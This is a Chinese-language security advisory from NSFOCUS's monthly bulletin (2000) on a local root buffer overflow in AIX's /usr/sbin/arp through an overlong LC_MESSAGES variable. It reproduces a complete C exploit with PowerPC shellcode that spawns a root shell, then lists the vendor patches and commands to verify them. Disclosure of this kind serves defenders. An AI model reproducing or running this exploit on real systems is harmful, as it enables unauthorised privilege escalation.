首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第9期->最新漏洞
作者:cripto (cripto@SUBTERRAIN.NET)
日期:2000-05-05
发布日期: 2000-5-8
更新日期: 2000-5-9
受影响的系统:
AIX 3.2
AIX 4.1.4.0
AIX 4.2
不受影响系统:
AIX 4.3
--------------------------------------------------------------------------------
描述:
AIX 4.1.4.0 中,当设置环境变量LC_MESSAGES为一个很长的字符串后,
当执行/usr/sbin/arp时将导致发生缓冲区溢出,攻击者可以获得本地
root权限。
<* 来源: cripto (cripto@SUBTERRAIN.NET) *>
--------------------------------------------------------------------------------
测试程序:
/*
* AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000
*
* This code is largely from an old AIX mount exploit by Georgi Guninski.
* Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340!
*
* Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom.
*
* -cripto
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define OFFSET 3580
char prog[100]="/usr/sbin/arp";
char prog2[30]="arp";
extern int execv();
char *createvar(char *name,char *value)
{
char *retval;
int l;
l = strlen(name) + strlen(value) + 4;
if (! (retval = malloc(l)))
{
perror("malloc");
exit(2);
};
strcpy(retval,name);
strcat(retval,"=");
strcat(retval,value);
putenv(retval);
return retval;
}
main(int argc,char **argv,char **env)
{
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET = 0;
int dobuf = 0;
char VAR[30] = "LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg = 1;
int ch;
unsigned int reta;
int corr = 4604;
char *args[4];
char *newenv[8];
int justframes = 1;
int startwith = 0;
mn = 78;
max = 100;
if (argc > 1)
{
corr = atoi(argv[1]);
}
else
{
corr = OFFSET;
}
pt = (unsigned *) &execv;
toc = *(pt+1);
eco = *pt;
if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF))
{
perror("invalid input");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 ) = (unsigned short) ((eco >> 16) &
0x0000ffff);
reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr;
for(nop = 0;nop < mn;nop++)
buf[nop] = startwith ? reta : 0x4ffffb82;
strcpy((char*)&buf[nop], (char*)&code);
i = nop + strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");
exit(5);
}
while(i++ < max)
buf[i] = reta;
buf[i] = 0;
for(i = 0;i < max-1;i++)
frame[i] = reta;
frame[i] = 0;
if(QUIET)
{
puts((char*)&buf);
fflush(stdout);
exit(0);
};
newenv[0] = createvar("EGGSHEL", (char*)&buf[0]);
newenv[1] = createvar("EGGSHE2", (char*)&buf[0]);
newenv[2] = createvar("EGGSHE3", (char*)&buf[0]);
newenv[3] = createvar("EGGSHE4", (char*)&buf[0]);
newenv[4] = createvar("DISPLAY", getenv("DISPLAY"));
newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6] = NULL;
args[0] = prog2;
execve(prog,args,newenv);
perror("execve\n");
}
--------------------------------------------------------------------------------
建议:
AIX已经提供了相应的补丁:
AIX 3.2.5
=========
应当打下列的PTFs:
PTFs - U447656 U447671 U447676 U447682 U447705 U447723 (APAR IX67405)
运行下列命令检测是否你的系统上已经安装了下列补丁:
lslpp -lB U447656 U447671 U447676 U447682 U447705 U447723
AIX 4.1
=======
应当打下列的补丁:
APAR - IX67407
运行下列命令检测是否你的系统上已经安装了下列APAR:
instfix -ik IX67407
或者运行下列命令:
lslpp -h bos.rte.libc
你的bos.rte.libc的版本应该是4.1.5.7 或者更高
AIX 4.2
=======
应当打下列的补丁:
APAR - IX67377
运行下列命令检测是否你的系统上已经安装了下列APAR:
instfix -ik IX67377
或者运行下列命令:
lslpp -h bos.rte.libc
你的bos.rte.libc的版本应该是4.2.0.11 或者更高
版权所有,未经许可,不得转载